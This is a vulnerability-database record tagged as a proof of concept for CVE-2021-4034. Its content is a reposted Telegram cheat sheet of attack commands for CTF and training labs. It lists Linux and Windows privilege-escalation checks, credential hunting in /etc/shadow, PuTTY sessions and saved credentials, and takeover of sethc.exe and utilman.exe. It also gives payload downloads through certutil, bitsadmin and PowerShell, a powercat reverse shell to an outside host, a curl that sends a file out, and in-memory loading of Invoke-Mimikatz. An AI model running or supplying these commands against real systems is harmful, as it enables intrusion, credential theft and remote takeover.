{"uuid": "c349bfa5-c3a8-4621-b1b6-f90d3f6f9c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/arm1tage/128", "content": "\u041e\u0431\u0449\u0438\u0435 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u043b\u0430\u0431\n\n\u2014 Priv Esc Linux \u2014\nfind / -perm -u=s -type f 2&gt;/dev/null - binaries to use for PrivEx\nfind / -perm /4000 2&gt;/dev/null -ls\n\ngetcap -r / 2&gt;/dev/null\n\nfind / -writable 2&gt;/dev/null | cut -d \"/\" -f 2,3 | grep -v proc | sort -u\n\nsudo -l\n\nexport PATH=/tmp:$PATH\necho $PATH\n\ncat .bash_history\n\n/etc/shadow\n/etc/crontab\n\nhostname / uname -a / cat /proc/version / ps / env / history / cat /etc/os-release\n\nGTFObins\nhttps://gtfobins.github.io/\n\n\n\u2014 Priv Esc Windows \u2014\n\n%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\nC:\\inetpub\\wwwroot\\web.config\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\web.config\n\n5985 - WinRM port\n\nCheck saved creds:\ncmdkey /list\nrunas /savecred /user:admin cmd.exe\n\nFind Creds from PuTTY:\nreg query HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions\\ /f \"Proxy\" /s\n\nCheck permissions on executables:\nicacls c:\\tasks\\schtask.bat\n\nGive permissions on executables:\nicacls C:\\Windows\\System32\\utilman.exe /grant Administrator:F\n\nTake ownership of the file:\ntakeown /f c:\\Windows\\System32\\sethc.exe\n\nCheck Installed software:\nwmic product get name,version,vendor\n\n\u2014 Other \u2014\n\n/usr/share/doc/python-impacket/example\n\nnc -v 0.0.0.0 4443\n\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\nget file via nc:\nOn the attack machine: cat linpeas.sh| nc -lvnp 1337\nOn the target machine: nc 1.1.1.1 1337 &gt; linpeas.sh\n\nget file via wget:\nwget http://1.1.1.1:1337/linpeas.sh\n\ncurl \u2014data @/home/kali/flag burp.collaborator\n\nLOLBAS:\ncmd.exe /C certutil.exe -urlcache -split -f http://10.9.3.48:1337/nc.exe nc.exe\nbitsadmin /transfer wcb /priority foreground http://10.10.15.193:1337/upload_nix.txt C:\\Users\\htb-student\\Desktop\\test.txt\n\nget file via smb:\nImpacket smb:\nsudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test\n\nOn windows:\ncopy \\\\10.10.14.37\\smb\\nc64.exe\nnet use n: \\\\192.168.220.133\\share /user:test test\n\npowershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://1.1.1.1:1337/powercat.ps1');powercat -c 1.1.1.1 -p 4443 -e cmd\"\n\npowershell \"(New-Object System.Net.WebClient).Downloadfile('http://:8000/shell-name.exe','shell-name.exe')\"\n\npowershell -c Invoke-WebRequest -Uri http://10.11.31.240/winPEASany.exe -OutFile C:\\Users\\bill\\winPEASany.exe\n\ngit file via ftp:\npython3 -m pyftpdlib --port 21\n(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\\Users\\Public\\ftp-file.txt')\nHTB Notes:\n(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\\Users\\Public\\Downloads\\PowerView.ps1')\nIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n\nInvoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1\nInvoke-WebRequest https:///PowerView.ps1 -UseBasicParsing | IEX\npython3 -c 'import urllib.request;urllib.request.urlretrieve(\"https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh\", \"LinEnum.sh\")'\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\nsqlitebrowser database.sqlite \nhttp://167.99.202.131:31462/storage/v1_db_backup_1604123342.tar.gz\ntar xvf v1_db_backup_1604123342.tar.gz \n\n/usr/share/windows-resources/binaries\n\nxfreerdp /dynamic-resolution +clipboard /cert:ignore /v:10.10.203.235 /u:Administrator /p:'TryH4ckM3!'\n\nVulnerable to CVE-2021-4034\nhttps://github.com/berdav/CVE-2021-4034\n\n\n#windows #linux #ctf", "creation_timestamp": "2024-12-11T18:23:04.000000Z"}